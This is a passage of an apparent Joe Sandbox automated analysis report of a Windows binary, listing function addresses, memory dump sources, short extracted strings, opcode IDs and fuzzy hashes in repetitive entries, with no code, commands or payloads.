                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,
                                                                              • API String ID: 0-3772416878
                                                                              • Opcode ID: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                              • Instruction ID: a17c4fa5bc1354185ce3f2a7f4cab73b3c8458d4fba7d9b04bd0d14d20238a06
                                                                              • Opcode Fuzzy Hash: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                              • Instruction Fuzzy Hash: 3AB1287120C3819FD324DF28C88461BBBE1AFA9704F448A2DF5D997342D675EA18CB67
                                                                              Function 00ABFC20 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: c0e285fb782897f3e9dbcab52d2397cf6bd00d06e2e702c14c3158e721afd446
                                                                              • Instruction ID: 2fd74f4d1541d27c5be303a90f0c6c65266c338f9429d32a74c5b2e1cd1957ac
                                                                              • Opcode Fuzzy Hash: c0e285fb782897f3e9dbcab52d2397cf6bd00d06e2e702c14c3158e721afd446
                                                                              • Instruction Fuzzy Hash: 7981BC71609300AFD710DFA8DD84B6AB7E9FB99705F188C2DF18587252E731E815CB62
                                                                              Function 00A9D457 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: e59c358b230bc13f90feb496a8d5fe8edd290331296a9e719808be9ca5f989d0
                                                                              • Instruction ID: 6a469c55c2ba6d0ff12d5dbed53e68fb1db43a432c715deaaff218c335fe7257
                                                                              • Opcode Fuzzy Hash: e59c358b230bc13f90feb496a8d5fe8edd290331296a9e719808be9ca5f989d0
                                                                              • Instruction Fuzzy Hash: 1861F271A09204DBDB10EF58DC82A2AB3F1FF95354F09092DF98A8B251E335E951CB92
                                                                              Function 00AC4A40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: bcd9fd1c3192ff6009bbcf7516149c63d0a52be9a8ccbc5c0463b5bcdfba5f6f
                                                                              • Instruction ID: d3ee69862c3ffdacc61faf150e5e33f422105089ba9972d22d291c0f4ed0ff0f
                                                                              • Opcode Fuzzy Hash: bcd9fd1c3192ff6009bbcf7516149c63d0a52be9a8ccbc5c0463b5bcdfba5f6f
                                                                              • Instruction Fuzzy Hash: F061E371A0D3019BD710DF65C8A0F2ABBE6EBC8314F2A891CE9C5872A1D731EC41CB59
                                                                              Function 00BD1592 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: r7"
                                                                              • API String ID: 0-2864999764
                                                                              • Opcode ID: 0aa5323ab607a90670508baaaaa354a875342f7e84b39eb4c5d5cce4c1982414
                                                                              • Instruction ID: 0858cd946e3c65b69bc6f950f1c40246f96a07ba44cef7ea5d17cfba63561230
                                                                              • Opcode Fuzzy Hash: 0aa5323ab607a90670508baaaaa354a875342f7e84b39eb4c5d5cce4c1982414
                                                                              • Instruction Fuzzy Hash: EB6114B3E186149FF744AA28EC853B6B7E5EB54320F1A493DEAC4C73C4E5399C058686
                                                                              Function 00A8E1A0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00A8E333
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                              • API String ID: 0-2471034898
                                                                              • Opcode ID: 1d752078703a717ca83913722db2b260e3a407754b0bfb425b194b18759f7ed8
                                                                              • Instruction ID: dcefb9db7f3889e7e6852e4c2e0f534e9a54842c6485f2b2fe75d2437114b69d
                                                                              • Opcode Fuzzy Hash: 1d752078703a717ca83913722db2b260e3a407754b0bfb425b194b18759f7ed8
                                                                              • Instruction Fuzzy Hash: 93513737B196A08BD328EA7C4C552AA7AD74BE2334B3EC369E9F5CB3E1E5154C014390
                                                                              Function 00AC3920 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: 5c53358d83e7103453b1908cd0bc450fa546a332cf7ff6838818abb07cb65901
                                                                              • Instruction ID: b5377cc021cb1ddab5ef78fc946481d3850cd7255a970d0823b156523f682340
                                                                              • Opcode Fuzzy Hash: 5c53358d83e7103453b1908cd0bc450fa546a332cf7ff6838818abb07cb65901
                                                                              • Instruction Fuzzy Hash: F0517D326092409BCB24DF55D990F2EBBE5FB89784F15C81CE4C697251D772ED20CB62
                                                                              Function 00BF6FBB Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fJ*
                                                                              • API String ID: 0-2622570556
                                                                              • Opcode ID: ffb86bffa760865227139b71eecbebcdbf78f61d39952b3da6c9e5809ee2ebad
                                                                              • Instruction ID: aa79e994bf91312ab6834a9ec696e41eeae0de3a9f8fbdfe7d2fed934dc1bc6b
                                                                              • Opcode Fuzzy Hash: ffb86bffa760865227139b71eecbebcdbf78f61d39952b3da6c9e5809ee2ebad
                                                                              • Instruction Fuzzy Hash: B94138F7E082145BF304AA2ADC4436BB696EBC0720F16C43D9B88A77D8E93D4C0646D9
                                                                              Function 00A91BEE Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L3
                                                                              • API String ID: 0-2730849248
                                                                              • Opcode ID: 9f2dc8b4ff353c613c8588427874f7d60bc5d1d164eff2734099b5c42a83d269
                                                                              • Instruction ID: c97073e1a451ad018ede3dd43307e555ad0ff3085e63e318494398247b001b89
                                                                              • Opcode Fuzzy Hash: 9f2dc8b4ff353c613c8588427874f7d60bc5d1d164eff2734099b5c42a83d269
                                                                              • Instruction Fuzzy Hash: 424173B81083819BCB149F69D894A2FBBF0FF8A314F048A1CF5C69B290D736C915CB56
                                                                              Function 00ABFF70 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: a4f80f5d648850dc8fda2ff4864ed4dd985a3a87662df91a1cdea41cd024c295
                                                                              • Instruction ID: fcdcb1b2831bebdb631eb065ea6c4f20aa81705cd39b5b4a05fba4d7e523d2bf
                                                                              • Opcode Fuzzy Hash: a4f80f5d648850dc8fda2ff4864ed4dd985a3a87662df91a1cdea41cd024c295
                                                                              • Instruction Fuzzy Hash: AB31C3B5A08305EBD610EB68DD81F2BB7E9EB85748F56482CF88597252E231DC14C7A3
                                                                              Function 00AAE40C Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 72?1
                                                                              • API String ID: 0-1649870076
                                                                              • Opcode ID: fb5e5e27a538ebdc02e72e5b7e3f18df011655d716da1dea3b489c2ddd066f2c
                                                                              • Instruction ID: 9298994074dce02e5512b6660fc3b30b86be3f67fb2536da5b772fbf660085d3
                                                                              • Opcode Fuzzy Hash: fb5e5e27a538ebdc02e72e5b7e3f18df011655d716da1dea3b489c2ddd066f2c
                                                                              • Instruction Fuzzy Hash: 8D31E1B5A01204DFCB20DFD5E9905AFFBB5FB0A744F540829E446AB341D335AE05CBA2
                                                                              Function 00A96F91 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: 68a3834734941833674cb92b569bd48742b845a2dce2ac64f7e3a090e681a346
                                                                              • Instruction ID: a6f425306f034b14add9adb198e2af4c5756157e903a67891175f4855c244023
                                                                              • Opcode Fuzzy Hash: 68a3834734941833674cb92b569bd48742b845a2dce2ac64f7e3a090e681a346
                                                                              • Instruction Fuzzy Hash: DD413575615B04DBDB25CB61DA94F2AB7F2FB09701F24891DE5869BAA1E331F8008B20
                                                                              Function 00AAE66A Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 72?1
                                                                              • API String ID: 0-1649870076
                                                                              • Opcode ID: 4c6a07477ac5444d05aa5a6f8f26895d05b4f8a289d8603f2bdfc73fec4cddb8
                                                                              • Instruction ID: 49c885388e60c51a0c2648ea0a30d0d1d3b3d81d8e5b3e202309979f631fe584
                                                                              • Opcode Fuzzy Hash: 4c6a07477ac5444d05aa5a6f8f26895d05b4f8a289d8603f2bdfc73fec4cddb8
                                                                              • Instruction Fuzzy Hash: D021AEB1A01204DFC720DF95E9A0A6FBBB5BB1A744F54081DE446AB381C335AD41CBA2
                                                                              Function 00AC9CE0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: @
                                                                              • API String ID: 2994545307-2766056989
                                                                              • Opcode ID: 955adea7583ddf3388bbe42218463338320b52a5474b584e89d7359c1a48db27
                                                                              • Instruction ID: bcbcdc8c1beb629b527fb4f34ff57e902f10439e834c858a61b3b9566a326f22
                                                                              • Opcode Fuzzy Hash: 955adea7583ddf3388bbe42218463338320b52a5474b584e89d7359c1a48db27
                                                                              • Instruction Fuzzy Hash: 443186709093008BD310DF24D884A2BFBF9EF9A314F25892CE1C6A7251D335D904CBA6
                                                                              Function 00A94E2A Relevance: 1.0, Instructions: 957COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
